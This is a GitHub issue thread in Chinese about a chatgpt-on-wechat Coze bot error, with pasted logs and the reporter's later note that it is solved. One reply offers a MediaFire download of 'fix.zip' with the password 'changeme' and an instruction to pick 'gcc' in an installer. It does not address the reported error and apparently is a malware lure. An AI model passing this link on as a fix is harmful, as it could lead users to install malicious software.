### ISSUE TITLE
我按照要求配置了，为什么会报错呢

### ISSUE THREAD

**Issue by xiaoyuancoder** [ImGoodBai/onewebot2#2]
### 前置确认

- [X] 我确认我运行的是最新版本的代码，并且安装了所需的依赖，在[FAQS](https://github.com/zhayujie/chatgpt-on-wechat/wiki/FAQs)中也未找到类似问题。

### ⚠️ 搜索issues中是否已存在类似问题

- [X] 我已经搜索过issues和disscussions，没有跟我遇到的问题相关的issue

### 操作系统类型?

Windows

### 运行的python版本是?

python 3.7

### 使用的chatgpt-on-wechat版本是?

Latest Release

### 运行的`channel`类型是?

wx(个人微信, itchat)

### 问题描述 😯

Start auto replying.
[INFO][2024-08-26 22:27:50][bridge.py:73] - create bot coze for chat
[INFO][2024-08-26 22:27:50][bytedance_coze_bot.py:25] - [COZE] query=你好
[WARNING][2024-08-26 22:27:50][session_manager.py:72] - Exception when counting tokens precisely for prompt: Unknown encoding cl100k_base
[ERROR][2024-08-26 22:27:50][bytedance_coze_bot.py:32] - [COZE] reply error=[COZE] Error: 发生了一些错误，请尝试再次操作。如果问题仍然存在，请联系我们的支持团队。
[INFO][2024-08-26 22:27:51][wechat_channel.py:246] - [WX] sendMsg=Reply(type=ERROR, content=[ERROR]
我暂时遇到了一些问题，请您稍后重试~), receiver=@f852f3d1a54ae8a24499d61e1b0f307da710dfe2548aff7ff2274f26d3cd259e

### 终端日志 📒

```log
<此处粘贴终端日志>
```

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaoyuancoder** [comment]
我已经解决了该问题，麻烦关闭一下议题。
